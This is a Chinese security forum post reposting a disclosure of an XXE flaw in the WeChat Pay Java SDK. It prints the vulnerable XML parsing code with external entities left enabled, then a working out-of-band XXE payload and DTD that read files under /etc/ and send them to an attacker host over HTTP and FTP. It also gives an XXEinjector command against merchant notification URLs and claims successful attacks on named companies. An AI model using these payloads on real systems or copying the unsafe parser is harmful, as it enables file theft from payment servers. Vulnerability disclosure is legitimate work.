漏洞
微信支付SDK存在XXE漏洞
匿名用户 2018-07-03 11:22:43 2227人浏览

http://seclists.org/fulldisclosure/2018/Jul/3 

这英文水平一看就是国人写的

image.png


 notify code example:

    [

        String notifyData = "....";

        MyConfig config = new MyConfig();

        WXPay wxpay = new WXPay(config);

//conver to map

        Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);


        if (wxpay.isPayResultNotifySignatureValid(notifyMap)) {

//do business logic

        }

        else {

         }



     ]

    WXPayUtil source code

   [


  public static Map<String, String> xmlToMap(String strXML) throws
Exception {

    try {

            Map<String, String> data = new HashMap<String, String>();

            /*** not disabled xxe *****/

            //start parse


            DocumentBuilderFactory documentBuilderFactory =
DocumentBuilderFactory.newInstance();

            DocumentBuilder documentBuilder =
documentBuilderFactory.newDocumentBuilder();

            InputStream stream = new ByteArrayInputStream(strXML.getBytes(
"UTF-8"));

            org.w3c.dom.Document doc = documentBuilder.parse(stream);



           //end parse





            doc.getDocumentElement().normalize();

            NodeList nodeList = doc.getDocumentElement().getChildNodes();

            for (int idx = 0; idx < nodeList.getLength(); ++idx) {

                Node node = nodeList.item(idx);

                if (node.getNodeType() == Node.ELEMENT_NODE) {

                    org.w3c.dom.Element element = (org.w3c.dom.Element) node
;

                    data.put(element.getNodeName(), element.getTextContent
());

                }

            }

            try {

                stream.close();

            } catch (Exception ex) {

                // do nothing

            }

            return data;

        } catch (Exception ex) {

            WXPayUtil.getLogger().warn("Invalid XML, can not convert to
map. Error message: {}. XML content: {}", ex.getMessage(), strXML);

            throw ex;

        }

    }



]




Post merchant notification url with  payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
  <!ENTITY % attack SYSTEM "file:///etc/">
  <!ENTITY % xxe SYSTEM "http://attacker:8080/shell/data.dtd";>
  %xxe;
]>

data.dtd:

<!ENTITY % shell "<!ENTITY % upload SYSTEM 'ftp://attack:33/%attack;
'>">
%shell;
%upload;

or use  XXEinjector tool  【https://github.com/enjoiz/XXEinjector】

ruby XXEinjector.rb --host=attacker --path=/etc   --file=req.txt --ssl

req.txt :
POST merchant_notification_url HTTP/1.1
Host:  merchant_notification_url_host
User-Agent: curl/7.43.0
Accept: */*
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

XXEINJECT


In order to prove this, I got 2 chinese famous company:
   a、momo: Well-known chat tools like WeChat
   b、vivo :China's famous mobile phone,that also famous in my country
250291575 2018-07-05 06:25:17 回复
太高级了。
奖励计划banner
今日推荐